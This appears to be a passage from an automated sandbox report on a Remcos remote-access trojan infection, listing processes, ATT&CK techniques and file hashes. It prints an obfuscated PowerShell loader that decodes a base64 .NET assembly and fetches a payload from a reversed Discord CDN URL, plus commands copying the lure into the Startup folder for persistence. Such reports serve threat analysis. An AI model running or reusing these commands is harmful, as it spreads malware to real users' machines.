nZXRfVXNlcgBCaXRDb252ZXJ0ZXIAZ2V0X0NvbXB1dGVyAE15Q29tcHV0ZXIAU3RkRXJyb3IAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXMATXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAENsYXNzTGlicmFyeTEuTXkuUmVzb3VyY2VzAENsYXNzTGlicmFyeTEuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBpbmhlcml0SGFuZGxlcwB0aHJlYWRBdHRyaWJ1dGVzAHByb2Nlc3NBdHRyaWJ1dGVzAEdldEJ5dGVzAGNyZWF0aW9uRmxhZ3MAZHdGbGFncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAZHdYQ291bnRDaGFycwBkd1lDb3VudENoYXJzAFJ1bnRpbWVIZWxwZXJzAENyZWF0ZVByb2Nlc3MAcHJvY2VzcwBiYXNlQWRkcmVzcwBhZGRyZXNzAENvbmNhdABGb3JtYXQAT2JqZWN0AE15UHJvamVjdABwcm90ZWN0AGdldF9EZWZhdWx0AGVudmlyb25tZW50AFN0ZElucHV0AFN0ZE91dHB1dABtX0NvbnRleHQAV293NjRHZXRUaHJlYWRDb250ZXh0AFdvdzY0U2V0VGhyZWFkQ29udGV4dABjb250ZXh0AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AENsYXNzTGlicmFyeTEuTXkAQXJyYXkAZ2V0X0Fzc2VtYmx5AEJsb2NrQ29weQBSZWFkUHJvY2Vzc01lbW9yeQBXcml0ZVByb2Nlc3NNZW1vcnkAY3VycmVudERpcmVjdG9yeQBTeXN0ZW0uU2VjdXJpdHkASXNOdWxsT3JFbXB0eQBNeVNldHRpbmdzUHJvcGVydHkAAAAAAC9DAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAsiAHsAMAB9ACIAAAMgAAAAAAAXcD7ydsIcRpthSuvAB90GAAMgAAEFIAEBERUGFRIoARIMBhUSKAESCAYVEigBEh0GFRIoARIkBCAAEwAEAAEcHAQgAQIcAyAACAYAARItETEDIAAOAh4ABRABAB4ABhUSOQETAAYVEigBEwAHBhUSOQETAAITAAUgAQETAAUAAgIcHAQgABJFBiACAQ4SRQYAARJNEk0CBg4FAAIODhwFAAEIEi0EAAECDgYAAw4ODg4CBhgGAAIIHQUIAwAACAYAAgYdBQgCHQUKAAUBEnUIEnUICAUAAR0FCAUAAQESZQUAARJZCAMAAAEEIAEBCAYgAQERgJEEIAEBDgQgAQECBSACAQ4OByAEAQ4ODg4EBwESDAQHARIIBAcBEh0EBwESJAcHAxI9AhI9BAcBEkEEBwESGAUHAwIIAjUHLQIIDhEwESwICB0ICAgICAIICAYdBQgCAgICAgICAgICAggICAgIAh0FAgICAgICAhJZAgMHAQIDBwEIBAcBEi0DBwEOBQcCHgACBAoBHgAHBwMTABMAAgQKARMACLA/X38R1Qo6CLd6XFYZNOCJEDEALgAwAC4AMQA1AC4AMAAHBhUSKAESDAcGFRIoARIIBwYVEigBEh0HBhUSKAESJAMGEj0DBhJBAwYSGAIGCQIGCAIGBgQAABIMBAAAEggEAAASHQQAABIkBAAAEj0EAAASQQUAAQESQQQAABIYEQAKAg4OGBgCCRgOEBEwEBEsBgACAhgdCAoABQIYCBAICBAICgAFAhgIHQUIEAgFAAIIGAgIAAUIGAgICAgEAAEIGAYAAgIOHQUIAAQCDg4dBQIEIAASLQcQAQEeAB4ABzABAQEQHgAECAASDAQIABIIBAgAEh0ECAASJAQIABI9BAgAEkEECAASGAQoABMACAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAABIBAA1DbGFzc0xpYnJhcnkxAAAFAQAAAAAXAQASQ29weXJpZ2h0IMKpICAyMDIxAAApAQAkNDUxNkUwRTEtNUMwRS00QjRFLTlBMzItOUUzN0UyM0U3NDI2AAAMAQAHMS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC41AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjUEAQAAAAgBAAEAAAAAABgBAApNeVRlbXBsYXRlCDExLjAuMC4wAABAAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyBzQuMC4wLjAAAFkBAEtNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLkVkaXRvcnMuU2V0dGluZ3NEZXNpZ25lci5TZXR0aW5nc1NpbmdsZUZpbGVHZW5lcmF0b3IIMTIuMC4wLjAAAAgBAAIAAAAAAGEBADRTeXN0ZW0uV2ViLlNlcnZpY2VzLlByb3RvY29scy5Tb2FwSHR0cENsaWVudFByb3RvY29sEkNyZWF0ZV9fSW5zdGFuY2VfXxNEaXNwb3NlX19JbnN0YW5jZV9fAAAAHQEAAQBUAhVTdHJpcEFmdGVyT2JmdXNjYXRpb24AEAEAC015LkNvbXB1dGVyAAATAQAOTXkuQXBwbGljYXRpb24AAAwBAAdNeS5Vc2VyAAATAQAOTXkuV2ViU2VydmljZXMAABABAAtNeS5TZXR0aW5ncwAAALQAAADOyu++AQAAAJEAAABsU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZVJlYWRlciwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5I1N5c3RlbS5SZXNvdXJjZXMuUnVudGltZVJlc291cmNlU2V0AgAAAAAAAAAAAAAAUEFEUEFEULQAAADERwAAAAAAAAAAAADeRwAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EcAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWGAAADwDAAAAAAAAAAAAADwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAScAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAAB4AgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAARAAOAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABEABIAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIAMQAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBkAGwAbAAAADwADgABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAMAAAA8DcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADflRHPAAAAAAIAAABxAAAAoG4AAKBQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEU6WXe+bK/zlMjaJoPukrwuABAAAARTpcUHJpdmFkb3NcTm92YSBwYXN0YVxNZXRvZG8gREZcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxEZWJ1Z1xDbGFzc0xpYnJhcnkzLnBkYgA5bwAAAAAAAAAAAABTbwAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARW8AAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFiAAAA8AwAAAAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAeAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAEQADgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAzAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAARAASAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAzAC4AZABsAGwAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAyADEAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEwAEgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAzAC4AZABsAGwAAAA8AA4AAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAGg/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==';[Byte[]] $fuUN = [System.Convert]::FromBase64String( $LHgK.replace('㈧㊢ς','A') );[System.AppDomain]::CurrentDomain.Load($fuUN).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.jn9050/7940435496145656211/0475049450369903111/stnemhcatta/moc.ppadrocsid.ndc//:sptth'))"
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4464
    - - C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3312
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:3628
- C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr
  "C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr" /S
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrnjhdf.exe'
    3⤵
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3292
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3320
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\HGDBCGFHJHMBNHJUFUYTHGFTRGDB.pdf"
  2⤵
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=791FC5FA53070294EEF1E0077AFF1EE9 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:4612
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E38AFF01D9C39DE2D161BD4924FFF88A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E38AFF01D9C39DE2D161BD4924FFF88A --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
      4⤵
      PID:1092
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B3F86DB17006F0D4E3789F959D18BFF0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B3F86DB17006F0D4E3789F959D18BFF0 --renderer-client-id=4 --mojo-platform-channel-handle=2180 --allow-no-sandbox-job /prefetch:1
      4⤵
      PID:3464
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=89DF958D832907EC642F97E650E60CF0 --mojo-platform-channel-handle=2580 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:3132
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8793CAF27531A8FDD7F97CDE11152DEE --mojo-platform-channel-handle=1800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:4340
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A6E8B76BE3FA95402584625DC7CCBA9D --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:4076

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Remcos\logs.dat

Filesize
230B

MD5
d9aa99d9c09d950cf02c64dc75294554

SHA1
23c648950fad8675775d3cdb6b4094c457c6ad0d

SHA256
67312bf21825e502e9558a74750e71f9089ec8f40b924c6088d0cce09d13322b

SHA512
e37bb0b0e3b6bdfceecaee2e8070bca6db6e0b408262e4e431691784ff7d8b8101095a7f0b0b757feacc7d961b1758a25c35aef7f36ac741536338c10cb2692b

Download Submit
C:\ProgramData\Remcos\remcos.exe

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
